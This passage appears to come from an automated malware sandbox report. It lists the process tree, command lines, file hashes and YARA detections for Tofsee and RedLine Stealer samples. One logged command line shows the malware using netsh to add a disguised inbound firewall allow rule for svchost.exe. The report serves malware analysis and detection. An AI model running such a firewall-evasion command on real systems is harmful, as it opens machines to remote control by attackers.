                                                                                                                      Imagebase:0xa0000
                                                                                                                      File size:60928 bytes
                                                                                                                      MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: conhost.exe PID: 6896 Parent PID: 7068

                                                                                                                      General

                                                                                                                      Start time:21:05:21
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                                      File size:625664 bytes
                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: netsh.exe PID: 3720 Parent PID: 5060

                                                                                                                      General

                                                                                                                      Start time:21:05:22
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                      Imagebase:0x11f0000
                                                                                                                      File size:82944 bytes
                                                                                                                      MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: xqfkdfcl.exe PID: 5432 Parent PID: 556

                                                                                                                      General

                                                                                                                      Start time:21:05:22
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d"C:\Users\user\AppData\Local\Temp\3136.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:13666304 bytes
                                                                                                                      MD5 hash:5C50CF4AF77D12BF94B3FC09437C8B16
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002A.00000003.388526176.00000000007F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002A.00000002.391463142.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002A.00000002.391805380.0000000000680000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002A.00000002.391938773.0000000000840000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                      Analysis Process: conhost.exe PID: 4560 Parent PID: 3720

                                                                                                                      General

                                                                                                                      Start time:21:05:22
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                                                      File size:625664 bytes
                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Analysis Process: svchost.exe PID: 3440 Parent PID: 5432

                                                                                                                      General

                                                                                                                      Start time:21:05:26
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:svchost.exe
                                                                                                                      Imagebase:0xb90000
                                                                                                                      File size:44520 bytes
                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002C.00000002.524985253.00000000007B0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                      Analysis Process: 3BC6.exe PID: 7064 Parent PID: 6244

                                                                                                                      General

                                                                                                                      Start time:21:05:29
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\3BC6.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\3BC6.exe
                                                                                                                      Imagebase:0x3c0000
                                                                                                                      File size:537088 bytes
                                                                                                                      MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002D.00000000.408848131.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002D.00000000.407524125.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002D.00000000.408441992.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002D.00000002.429951321.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002D.00000000.408078077.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                      Analysis Process: svchost.exe PID: 7140 Parent PID: 556

                                                                                                                      General

                                                                                                                      Start time:21:05:32
                                                                                                                      Start date:14/01/2022
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff797770000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Disassembly

                                                                                                                      Code Analysis

                                                                                                                      Reset < >